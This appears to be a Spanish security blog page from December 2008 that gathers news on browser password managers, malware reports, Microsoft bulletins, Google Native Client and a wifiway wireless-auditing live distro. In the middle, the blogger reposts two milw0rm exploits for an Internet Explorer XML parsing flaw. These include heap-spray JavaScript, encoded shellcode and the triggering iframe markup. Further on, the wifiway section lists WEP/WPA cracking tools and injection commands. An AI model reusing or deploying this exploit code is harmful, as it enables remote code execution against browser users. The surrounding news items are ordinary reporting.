kernelpanic.org.mx

La mayoría de los navegadores web incorporan una función que permite recordar las claves de acceso de los sitios visitados. Sin embargo, ¿qué garantía hay de que el navegador entregue las contraseñas solo a los sitios seleccionados por el usuario, y no a sitios de intrusos?

La compañía de seguridad informática Chapin Information Services ha probado la forma en que los programas Google Chrome, Microsoft Internet Explorer, Apple Safari, Opera y Mozilla Firefox gestionan la seguridad de las contraseñas.

Según la prueba, todos los navegadores, sin excepción, hacen un mal trabajo respecto de la protección de las contraseñas de los usuarios. Los navegadores Opera y Firefox obtienen la mejor puntuación, pero aún así sólo lograron superar 7 de 21 pruebas. Internet Explorer logró superar cinco de las pruebas.

Los peores resultados fueron conseguidos por los productos Google Chrome y Apple Safari, que sólo superaron dos de las 21 pruebas.

Formularios adulterados
Uno de los problemas de seguridad revelados en la prueba es que algunos de los navegadores pueden ser inducidos a enviar contraseñas correspondientes a distintos servicios, a un sitio único. Precisamente esta táctica fue utilizada durante un ataque a MySpace, donde los atacantes usaron un formulario adulterado de inicio de sesión. Debido a que tanto el formulario auténtico como el adulterado estaban almacenados en el mismo sitio, los intrusos pudieron acceder a la información de inicio de sesiones, esto es nombre de usuario y clave.

La vulnerabilidad también está presente en Firefox, pero sus desarrolladores ya habrían solucionado el problema. Chrome y Safari continúan siendo vulnerables ante este tipo de ataques, según Chapin Information Services.

Otro problema es que los navegadores no suelen comprobar a qué sitio está comunicando las contraseñas. Solo Firefox y Opera pueden evitar que el navegador permita enviar las contraseñas a otro dominio que aquél para el que fue inscrita cuando fue almacenada en el gestor de contraseñas.

De igual modo, formularios invisibles contenidos en algunos servicios también pueden activar la función de gestión de contraseñas de los navegador es. De esa forma, el navegador puede ser inducido a entregar la contraseña sin que el usuario siquiera se percate.

Tu mismo puedes comprobar la seguridad de la función de contraseñas de tu navegador en esta página.

fuente:diarioti.

suerte.

La compañía estadounidense Black Duck descalifica categóricamente 5 de los principales mitos del software de código abierto.

“El código abierto consiste solamente de código fuente y no de programas completos y funcionales”, “La versión 3 de GPL es ignorada”. Mitos como éstos han sido desmentidos por la compañía estadounidense Black Duck en un reciente informe.

Black Duck ha elaborado una base de datos consistente de 160 000 proyectos de código abierto desde 4 000 sitios distintos, realizando un análisis acucioso de la información recabada. Con base en esa información, Black Duck dice poder desmentir, con evidencias, cinco de los principales mitos del código abierto.

El primer mito es que el código abierto consiste solamente de código fuente distribuido en Internet. Sin embargo, el código fuente constituye sólo el 15% de material distribuido en proyectos de código abierto, según los datos de Black Duck. El resto consiste de archivos binarios como gráficos, documentación y otro material.

El segundo mito es que el código abierto es usado fundamentalmente en proyectos de aplicaciones de infraestructura TI como Linux y MySQL. En realidad, el ámbito del código abierto está dominado por componentes, no por aplicaciones completas, y tales componentes son reutilizados en decenas de distintos proyectos. Por ejemplo, Apache Log4j es usado a más de 5 500 proyectos. En el mundo de Java hay 14 veces más archivos con la raíz .class (componentes binarios) que con la raíz .class (código fuente). Luego está el mito de que en Internet circularía un par de miles de millones de líneas de código abierto. De hecho, la cifra es 10 veces mayor y el 23% del código abierto fue publicado o renovado en 2008, según la estadística, que indica además que el 90% ha sido escrito en alguno de los grandes idiomas C, C++, C# o Java.

Otro mito es que los “un programador que se precie de tal” prácticamente no incluye comentarios sobre su código. De hecho, una de cada dos líneas de código incorpora un comentario en un programa Java típico.

El último mito es que la versión 3 de GPL (General Public License) es ignorada. En los hechos, Black Duck ha encontrado más de 6 300 proyectos bajo GPL, en tanto que aproximadamente 70% de todos los proyectos de código abierto usan una variante de la licencia GPL.

fuente: http://www.diarioti.com

Estos exploits ya tienen algun tiempo que fueron publicados en http://www.milw0rm.com/ hasi que espero ya allan jugado lo suficiente con ellos como yo.

// k`sOSe 12/10/2008 – tested on winxp sp3, explorer 7.0.5730.13

// windows/exec – 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe

http://milw0rm.com/sploits/2008-iesploit.tar.gz

# milw0rm.com [2008-12-10]
——————————————————————————————————————————————————–

<html>
<script>

	// k`sOSe 12/10/2008
	// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
 	// Heap spray address adjusted for Vista - muts / offensive-security.com
	// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
	// http://www.offensive-security.com/0day/iesploit-vista.rar
	// windows/exec - 141 bytes
	// http://www.metasploit.com
	// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
	var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
  	var block = unescape("%u0c0c%u0c0c");
	var nops = unescape("%u9090%u9090%u9090");

	while (block.length < 81920) block += block;
	var memory = new Array();
	var i=0;
	for (;i<1000;i++) memory[i] += (block + nops + shellcode);

	document.write("<iframe src=\"iframe.html\">");

</script>

</html>

<!-- iframe.html

<XML ID=I>
	<X>
		<C>
			<![CDATA[
				<image
					SRC=http://&#3084;&#3084;.xxxxx.org
				>
			 ]]>

		</C>
	</X>
</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
	<XML ID=I>
	</XML>

	<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
	</SPAN>
</SPAN>

-->

# milw0rm.com [2008-12-10]

La Hakipedia de colaboración es un esfuerzo destinado a centralizar la información y los artículos en lo que respecta a las diferentes capas de la piratería sub-cultura. La idea de que es Hakipedia fue generado por la falta de información disponible en el ámbito de la seguridad, y el hecho de que para obtener toda la información en dicho ámbito, habría que visitar muchos lugares y pasar más tiempo del necesario la búsqueda de los datos que requieren; Hakipedia se creó debido a la necesidad de poner toda esta información a la un lugar.

http://www.hakipedia.com/index.php/Hakipedia

Panda Security ha realizado un estudio sobre más de 300 establecimientos para el envío de dinero al extranjero. En el mismo se analizaron aproximadamente unas 1.500 computadoras, concluyéndose que al menos el 30% tenían el software antivirus desactualizado, y el 60% de esas 1.500 máquinas estaban infectadas.

Al no estar convenientemente protegidos y ser utilizados por los usuarios para otros fines (chats, descargas, etc.), estos ordenadores son muy inseguros para realizar operaciones bancarias. Los ciberdelincuentes pueden realizar sobre ellos distintas acciones destinadas al robo de dinero. Alguna de esas amenazas son:

- Instalación de un Troyano o keylogger en la computadora que tuviesen por objetivo, capaz de capturar información que aparece en la pantalla, como el número de cuenta de quién envía el dinero y de quién lo recibe, claves bancarias, códigos PIN, etc. Todo esto se vería facilitado debido a la conducta de alto riesgo de las personas que utilizan los ordenadores y a los estándares muy pobres respecto a la seguridad, tales como software antivirus en versiones de evaluación y la poca frecuencia de mantenimiento que se brinda a los sistemas.

- Un ataque por phishing específicamente dirigido (simulando proceder de alguna de las entidades más populares de envío de dinero al extranjero) o la infección con códigos maliciosos que redireccionen a los usuarios a páginas fraudulentas.

“El peligro de estos ordenadores es que, pese a ser inseguros, son utilizados muy frecuentemente para realizar operaciones bancarias, lo que supone un importante riesgo ya que se manejan datos muy sensibles en ordenadores infectados y vulnerables”, explica Luis Corrons, director técnico de PandaLabs, que añade: “La combinación de falta de mantenimiento, poca conciencia respecto a la seguridad y conducta de los usuarios finales da como resultado sistemas altamente vulnerables que podrían permitir a los cibercriminales infiltrarse con relativa facilidad”.

BitDefender hace público el descubrimiento de un nuevo tipo de aplicación en activo de robo de contraseñas que se hace pasar por un plugin de Mozilla Firefox. El malware, Trojan.PWS.ChromeInject.A, se descarga en la carpeta de Pluging de Mozilla Firefox y se ejecuta cada vez que el usuario abre dicho navegador.

Trojan.PWS.ChromeInject.A actúa filtrando los datos enviados por el usuario en más de 100 sitios web de compra o banca online. Entre las webs afectadas se encuentran: bankofamerica.com, chase.com, halifax-online.co.uk, wachovia.com, paypal.com y e-gold.com.

Aquellos usuarios infectados con el Trojan.PWS.ChromeInject.A envían sus credenciales de acceso a una dirección web similar. Tanto el dominio como el servidor de hosting están localizados en Rusia, lo que da indicios del punto de origen de la amenaza.

Microsoft informa, a través de sus boletines mensuales de seguridad, de los resultados periódicos de su labor de investigación y mejora de sus productos y soluciones.

Dichos boletines incluyen la información y recursos que los usuarios necesitan para mantener sus instalaciones actualizadas y, por lo tanto, protegidas ante cualquier ataque.

Dentro de esta iniciativa, en el mes de diciembre de 2008, Microsoft hace públicos ocho nuevos boletines de seguridad en los que informa de las siguientes actualizaciones:

- MS08-070 resuelve seis vulnerabilidades en los controles ActiveX para los archivos extendidos de tiempo de ejecución de Microsoft Visual Basic 6.0. Tiene un rango severo máximo crítico.

- MS08-071 resuelve dos vulnerabilidades de Microsoft Windows. Si se aprovechan estas vulnerabilidades, se podría permitir la ejecución remota de código si un usuario abre un archivo de imagen WMF maliciosa. Tiene un rango severo máximo crítico.

- MS08-072 resuelve ocho vulnerabilidades en Microsoft Office Word y Microsoft Office Outlook que podrían permitir la ejecución remota de código si un usuario abre un archivo de Word o RTF (formato de texto enriquecido) especialmente diseñado. Tiene un rango severo máximo crítico.

- MS08-073 resuelve cuatro vulnerabilidades en Microsoft Windows (Internet Explorer). Las vulnerabilidades podrían permitir la ejecución remota de código si un usuario visita una página web especialmente diseñada mediante Internet Explorer. Tiene un rango severo máximo crítico.

- MS08-074 resuelve tres vulnerabilidades en Microsoft Office Excel que podrían permitir la ejecución remota de código si un usuario abre un archivo de Excel especialmente diseñado. Tiene un rango severo máximo crítico.

- MS08-075 dos vulnerabilidades en Búsqueda de Windows. Estas vulnerabilidades podrían permitir la ejecución remota de código si un usuario abre y guarda un archivo de búsqueda guardada especialmente diseñado en el Explorador de Windows o si hace clic en una dirección URL especialmente diseñada. Tiene un rango severo máximo crítico.

- MS08-076 resuelve dos vulnerabilidades en los siguientes componentes de Windows Media: Reproductor de Windows Media, módulo de tiempo de ejecución de Windows Media Format y Servicios de Windows Media. Tiene un rango severo máximo importante.

- MS08-077 resuelve una vulnerabilidad en Microsoft Office SharePoint Server que podría provocar la elevación de privilegios. Tiene un rango severo máximo importante.

Las actuales aplicaciones web ya sea están basadas en estándares como los del concepto Ajax o en tecnologías que mediante extensiones del navegador integran otras categorías de contenidos en sitios web corrientes. Ejemplos de estos son los tecnologías Flash, Java y Silverlight.

Google es una compañía que ha invertido considerable trabajo y recursos en el desarrollo de aplicaciones basadas en la web. Tanto así que la compañía está desarrollando su propio navegador, Chrome, que con su sencillo interfaz elimina elementos distractores cuando los usuarios están más bien ocupados en los contenidos presentados por las aplicaciones web ejecutadas en el propio navegador.

Chrome incorpora el motor Javascript V8, que proporciona un desempeño en Javascript considerablemente mejor que la mayoría de los navegadores existentes. Sin embargo, todo indica que Google estima que Javascript no está, en sí, en condiciones de entregar el rendimiento que de muchas formas es necesario para que una aplicación web resulte en la misma experiencia para el usuario que una aplicación ejecutada localmente en el PC.

Una solución para lo anterior es traspasar determinadas tareas a una de las citadas extensiones, pero Google no acostumbra basar sus soluciones en tecnologías controladas por los competidores.

Por tal razón, Google está desarrollando su propia extensión para el navegador. Esta sería “neutral”; es decir, funcionaría con todos los navegadores, y sería compatible con todas las versiones modernas, x86, de Windows, Macintosh y Linux. La empresa desarrolla además soporte para otras arquitecturas de procesadores, como por ejemplo ARM y PPC, lo que abre la posibilidad de soporte para teléfonos móviles y consolas de juegos, entre otras cosas.

La finalidad elemental de la futura extensión, denominada Native Client (NaCl), sería dar a las aplicaciones web mucho mejor acceso a la capacidad de cálculo del procesador.

En un comentario en su blog, Brad Chen, del grupo Native Client, de Google, plantea el ejemplo de un sitio para el intercambio y edición de fotografías, que permite al usuario editar las fotos directamente en el navegador, sin abandonar sitio web. Esto puede ser conseguido actualmente, por ejemplo, usando una combinación de JavaScript y ejecución del servicio en el servidor. Esto requiere, sin embargo, el flujo de grandes volúmenes de datos entre el navegador y el servidor, lo que puede ocasionar grandes esperas, incluso cuando el usuario sólo decide hacer pequeños cambios a sus imágenes.

Otras posibilidades involucran el uso del gráfica 3D.

“La posibilidad de poder ejecutar código específico para sistemas en el PC del usuario permite realizar el procesamiento de las imágenes en la propia CPU del PC del usuario, lo que resulta en una aplicación mucho más ágil, al reducirse fuertemente la transmisión de datos y con ello los retrasos”, escribe Chen.

A juicio de Chen, uno de los principales desafíos es la seguridad. “Para contribuir a proteger a los usuarios de malware, conservando la movilidad, hemos definido estrictas reglas para los módulos aceptados”, escribe Chen. Entre otras cosas, los módulos deberán ser elaborados según una serie de criterios estructurales que hacen posible convertirlos en instrucciones. Asimismo, no estará permitido que los módulos contengan determinadas secuencias de instrucciones.

“Este marco estructural apunta a permitir a nuestro runtime detectar y evitar la ejecución de propagación de código potencialmente maligno. Entendemos que es un gran desafío hacer que esta tecnología sea segura y precisamente por esa razón la convertiremos en código abierto en una etapa temprana”, indica Chen.

“A nuestro juicio, la evaluación y los comentarios de la comunidad de desarrolladores, sumada al análisis público de la herramienta, contribuyen considerablemente a mejorar la calidad y seguridad de tecnologías de este tipo”. En ésta página, Google pública una versión de prueba de Native Client. La instalación es compleja e indudablemente no está adaptadas a usuarios finales, solo a expertos.

Versiones de pruebas están disponibles para Windows, Mac y Linux, y para los navegadores Firefox, Safari, Opera y Chrome. El hecho que no se incorpore el navegador Internet Explorer obedece a que éste no tiene, desde 2001, soporte para Netscape Plugin Application Programming Interface (NPAPI). Desde ese año, todas las extensiones para Internet Explorer debieron ser basadas en ActiveX. Los demás navegadores tienen soporte para NPAPI.

La publicación Golem.de ha publicado un vídeo en Youtube , que muestra algunos ejemplos de lo que es posible hacer al tener instalado Native Client.

Fuentes: Blog de Native Client y Golem.

Descarga directa iso: http://download.wifislax.com:8080/wifiway-1-final.iso

Tamaño: 664.6 Megas
Es inferior a la beta con mucho mas contenido gracias a las ultimas linux-live,
lo cual la hacen mas rapida y menos necesidad de memoria RAM.
MD5: 2fac135cad7b185706bbcb9c51f45932 wifiway-1-final.iso
Descarga fichero MD5: http://download.wifislax.com:8080/wifiway-1-final.iso.md5

Nota: No aconsejamos usar firefox 3 para la descarga del fichero ISO

Kernel

Kernel: 2.6.27.7

Adaptado para modo liveusb 2.6.27.7 SMP mod_unload 486
Mantenemos las fuentes al completo y limpias, para la posiblidad de actualizar drivers.
Kernel tipo SMP permite aprovechar el 100% de los equipos con 2 nucleos, DUAL CORE

Entorno grafico
Kde: 3.5.9 estable
Con diferentes idiomas; castellano, ingles, aleman, portugues, catalan, vasco y frances.
Por supuesto las aplicaciones tipicas del etorno grafico KDE

Entorno alternativo x-win Fluxbox 0.9.15.1, podemos determinar el entorno a iniciar, por defecto es el KDE

startx		...  to start Xwindow

	kde		...  to start Xwindow with KDE

	flux		...  to start Xwindow with fluxbox

Ademas referente al entorno grafico:

autox    	...  to configure automatic the environment XWindow

	autoxdefault    ...  to restore default the environment XWindow (Vesa)

por defecto se  inicia con Vesa, asi el entorno grafico puede entrar en muchos mas equipos.

Drivers mas importantes y mas utilizados a nivel universal

Modo monitor:

airmon-ng start  <interface>

Permiten inyección:

aireplay-ng -9 <interface>

Familia ieee80211
Ralink USB rt2570
Ralink PCI rt2500
Ralink rt61, debido a su incompatiblidad con los madwifi, se deben cargar a traves de lanzador
Ralink USB rt73, mantenemos el viejo lanzador por si carga los rt2570
Atheros madwifi-hal, la primera y unica live que soporta nativamente los nuevos chipset de atheros
Intel pro wireless ipw2200
Realtek r8187, los de la famosa alfa blanca, la unica live que  lleva estos drivers con kernel 2.6.27
Intel pro wireless 3945, ipwraw old, los primeros drivers paar estos equipos que hemos mantenido, por defecto no se cargan, se debe usar lanzador.

Familia mac80211
La nueva generacion de drivers, suite aircrack-ng adaptada a ellos, se trabajan con interfaces diferentes, siempre del tipo

monX

Zydas zd1211rw-mac80211
Intel pro wireless iwlagn con firmware para las nuevas iwl4965 y iwl5×00, siendo la unica live que incopora nativamente estos drivers.
Intel pro wireless iwl3945, son cargados por defecto, tambien la unica live que los incluye.
Broadcom b43 y b43legacy, me repito pero la unica live que los incluye

Ademas hemos mantenido los drivers siguientes en la ruta /opt/drivers, los cuales se deberam cargar a mano, suponemos que son mejores los nativos, si bien hemos mantenido los siguientes por si los nativos dieran problemas

Ralink rtx200
Intel pro wireless ipw2×00

Atheros ath5k
Atheros ath9k

Navegacion
Firefox 2.0.0.18
Plugin noscript (notad que cada 2 por 3 sacan nuevos update y no podemos
sacar una live cada 4 dias)
Plugin ShowIP
Plugin DOM Inspector
Idiomas Español y Ingles

amsn
kopete

Aplicaciones auditoria wireless

Suite Aircrack-ng 1.0 rc1 r1223, perfecta para trabajar con la nueva serie de drivers mac802111

Matizamos que el aircrack-ng ejecutable es Aircrack-ng 0.9.3, esto es debido a que la serie rc1 no trabajan bien para WEP cpn diccionario (-w), indispensable para el territorio español, y que aun no han corregido a pesar de las innumerables capturas que les hemos mandado.

Ademas incorporamos las aplicaciones  airdecloak-ng y  Tkiptun-ng, aunque son sus versiones en fase de pruebas, no inician el tratamiento WPA de forma diferente al habitual.

Dentro de Aplicaciones auditoria wireless incorporamos la sección estudio de cifrados con los siguiente programas:

jazzteldecrypter
stkeys
wlandecrypter con toda la nueva serie de MAC que ha aparecido hasta el momento.
dlinkdecrypter
rfidtool version 0.2
decsagem
wepattack
weplab
cowpatty

La mayoria de esta aplicaciones llevan lanzador grafico, y tambien estan incorporadas en el nuevo airoscript

airoscript
Ideal para iniciados en el analisis seguridad wireless. Mantenemos 3 versiones, la oficial en ingles, la de siempre en español, y una nueva en español con la incorporacion de jazzteldecrypter, stkeys, wlandecrypter y dlinkdecrypter

wlaninject

wifizoo 1.3

wireshark

airpwn

hamster & ferret

Aplicaciones wireless estandar

wifi-radar
Kwifimanager
Wireless assisntat
wifiscanner
WPA-GUI: Soporte conexion grafica wpa-psk
rutilt para los drivers de ralink

Apliaciones extra-ocio

Un pequeño guiño al profesional o ameteur que se decica a la adutoria wireless

Juego de ajadrez Xboard, para que no se diga que los que no dedicamos a este mundo somos unos frikis sin dos dedos de frente, y porque no, mientras esperamos a capturas petciones de ARP validas.

Juego Papa-Patata, indispensable, para que mi hijo no se aburra mientras decido cientos de horas a realizar auditorias

wink personalmente no lo he usado y no se para que sirve, pero muchos compañeros se empeñaron en que se pusiera, lo siento pero tenia que decirlo.

gparted no recuerdo bien si estaba en la version beta, pero personalmente me encanta esta apliacion, que es muy util para la creacion de livecd sobre todo cuando la cagas y tienes que volver para atras, hay un liveCD con el nombre de dicha aplicacion, quizas no funcione al 100% pero es de mucha utilidad.

netcat definido en Wikipedia como najava multiusos

Nota: Hay muchas mas aplicaciones pero creemos oportuno mencionar las que hemos añadido o mejorado, esta version mantiene muchas de las aplicaciones incorporadas en versiones anteriores, por citar algun ejemplo: nmap, gFTP, KSnapshot, kedit, etc.

Como mencion especial y con todos los derechos del mundo:

wifipacket

Wifipacket 0.1 para seguridadwireless.net por Pianista

wifipacket [opcion] (name)

Opciones:

update --- Actualiza la lista de paquetes

list --- Lista los paquetes disponibles

install --- Instala el paquete seleccionado (-v) especifica la version a instalar

-v --- Muestra creditos de wifipacket

Es una actualizador personalizado para wifiway, aplicable a wifislax en futuras versiones, que permitira en un futuro muy proximo a los seguidores de wifiway, poder actulizar su distribuccion sin tener que descargarse nuevas lives, cabe decir que es para aquellos usuarios que tienen instalado wifiway en sus equipos, usarlo para modo live, podra ser pero no con toda su pontencia, una actualizacion de la suite ng o un driver bien, pero imaginemos la actualizacion de todo un kernel entero, o de todo un kde.

Por lo tanto se usara en el futuro para actualizaciones

Mencion especial tambien, para el instalador exclusivo de wifiway, es una serie de programa graficos que se ejecutan desde el menu

Menu – Sistema  -  Wifiway Install, encontramos varias  opciones, la que lo engloba todo es
>> Install Wifiway, en idioma ingles y castellano, aunque tambien podemos encontar 3 posiblidades mostradas en versiones anterirores, copia del contenido, edicion y creacion del GRUB, modifcacion MBR, etc

Posiblemente algunos de vosotros ya haya vosto dicho manual y habreis pensado, pero si eso no estaba en la version beta, digamos que el manual ha salido antes que la propia live

Logo exclusivo wifiway carga kernel, asi los copiones de siempre, por lo menos esta vez se tendran que molestar en compilar el kernel, cosa que tambien esta facilitada en la nueva wifiway, pero que son tan simples que solo la palabra compilar kernel posiblemente los heche para atras, aunque tampoco me extrañaria que dejaran el propio logo y saquen una version propia , ¿se aceptan apuestas?

Carga de livecd tuneda, adaptada y exclusiva para wifiway……….venga que esta tambien es facil de modificar.

Fecha:  10/Diciembre/08
Lugar: Plaza 4 Caminos ( Area Comedores )
Hora: 6:30
Temas a debatir: indefinidos…

Esperamos contar con su Presencia…